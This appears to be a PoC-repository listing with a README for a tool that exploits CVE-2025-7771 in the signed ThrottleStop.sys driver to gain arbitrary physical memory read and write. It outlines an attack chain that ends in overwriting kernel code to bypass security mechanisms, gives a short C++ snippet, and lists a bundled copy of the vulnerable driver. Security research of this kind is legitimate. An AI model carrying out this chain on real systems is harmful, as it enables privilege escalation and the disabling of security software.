来源

关联漏洞

描述

Arbitrary physical memory read/write exploitation using ThrottleStop.sys (CVE-2025-7771) with superfetch address translation - Windows kernel security research

介绍

# Physical Memory Mapper

Research tool demonstrating physical memory access through virtual-to-physical address translation combined with vulnerable driver exploitation.

## Overview

This project explores low-level Windows memory management by combining the superfetch technique for address translation with IOCTL-based physical memory access. Built to understand kernel-mode/user-mode interaction and memory subsystem internals.

## CVE-2025-7771 – ThrottleStop.sys Physical Memory Access R/W

### Vulnerability Summary

**CVE ID:** CVE-2025-7771  
**Component:** ThrottleStop.sys (signed driver from TechPowerUp LLC)  
**Affected Version:** ThrottleStop 3.0.0.0 and potentially others  
**Vulnerability Type:** Exposed IOCTL with Insufficient Access Control (CWE-782)  
**CVSS Score:** 8.7 (High) – Kaspersky Labs  
**Impact:** Local Privilege Escalation (LPE)

### Technical Details

The ThrottleStop.sys driver exposes two IOCTL handlers that allow completely arbitrary physical memory read and write operations via `MmMapIoSpace`. There are no validation checks, boundary restrictions, or access controls on these interfaces. Any user-mode application can specify any physical address and read or write arbitrary data.

This unrestricted access enables:
- Reading sensitive kernel data structures and cryptographic material
- Writing to arbitrary physical addresses to modify kernel code
- Bypassing all Windows security mechanisms (KASLR, PatchGuard, DSE)
- Overwriting function pointers to redirect kernel execution
- Disabling security software by patching their kernel components

The arbitrary nature of the access means an attacker has complete control over physical memory without any restrictions imposed by the driver.

### Attack Vector

The exploitation follows this pattern:

1. **Driver Access** → Open handle to `\\.\ThrottleStop` device object
2. **Address Discovery** → Use `NtQuerySystemInformation` to locate kernel base address
3. **Translation** → Apply superfetch technique to convert virtual addresses to physical
4. **Memory Operations** → Issue IOCTL commands for read/write to physical memory via `MmMapIoSpace`
5. **Kernel Manipulation** → Overwrite kernel functions or security structures

Real-world malware has leveraged this vulnerability to disable security products by patching kernel functions like `NtAddAtom` to hijack execution flow.

## Implementation

This project demonstrates the technical components of such an attack chain for educational purposes:

**Superfetch Integration** – Translates kernel virtual addresses to physical addresses using `SystemSuperfetchInformation`

**Driver Interface** – Communicates with vulnerable driver through `DeviceIoControl` for physical memory operations

```cpp
// Acquire memory map for translation
auto mm = spf::memory_map::current();

// Translate virtual kernel address to physical
void* virt = reinterpret_cast<void*>(0xFFFFF80000001000);
std::uint64_t phys = mm->translate(virt);

// Access physical memory through driver
ULONG64 value = Driver.ReadPhysical<ULONG64>(phys);
```


## References

- CVE-2025-7771 Details
- Kaspersky Security Research on Active Exploitation
- [superfetch library](https://github.com/jonomango/superfetch)

## Disclaimer

**Educational and research purposes only.** Unauthorized access to computer systems is illegal. This code demonstrates documented vulnerabilities for defensive security research.

## License

MIT License

文件快照

 [4.0K]  /data/pocs/8f3a164d2f973b55eb75c9eccc64375e3e40ca4e
├── [4.0K]  Driver
│   └── [7.4K]  Driver.h
├── [1.8K]  Entry.cpp
├── [3.4K]  README.md
├── [4.0K]  Superfetch
│   ├── [3.9K]  nt.h
│   └── [6.9K]  Superfetch.h
├── [ 160]  ThrottleStop.slnx
├── [ 49K]  ThrottleStop.sys
├── [6.6K]  ThrottleStop.vcxproj
└── [1.2K]  ThrottleStop.vcxproj.filters

3 directories, 9 files

备注